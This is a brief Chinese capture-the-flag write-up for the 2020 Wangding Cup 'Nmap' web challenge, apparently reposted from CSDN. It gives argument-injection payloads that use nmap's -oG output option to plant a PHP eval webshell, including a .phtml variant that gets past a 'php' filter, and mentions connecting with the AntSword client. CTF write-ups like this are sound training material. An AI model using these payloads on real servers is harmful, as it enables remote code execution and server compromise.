[网鼎杯 2020 朱雀组]Nmap - 码农知识堂 - 文章详情页

[网鼎杯 2020 朱雀组]Nmap
我随便输了个127.0.0.1

还有list.php 好像没什么用

昨天刚用了nmap的-oG参数

nmap常用命令

nmap详细使用教程_nmap使用教程-CSDN博客

试一下
```
' php @eval($_POST["a"]);?> -oG a.php '
```
回显

测试发现php被过滤了

文件的内容
```
'  @eval($_POST["pwd"]);?> -oG 1.phtml  '
```
上传成功了

使用蚁剑连接
相关阅读:
Win环境部署SuperMap iServer
单连通图的判断
 【英语：基础进阶_原著扩展阅读】J1.英文原著的选择和有效阅读方法
 tictoc 例子理解 13-15
网络信息安全实训【SQL注入】
python与自然语言处理3朴素贝叶斯
 Centos7下zabbix安装与部署，设置中文（保姆级图文）【网络工程】
【学习笔记之菜Dog学C】动态内存管理
 流程引擎-自定义函数的应用
 掌握C语言指针，轻松解锁代码高效性与灵活性
原文地址：https://blog.csdn.net/2202_75317918/article/details/133361227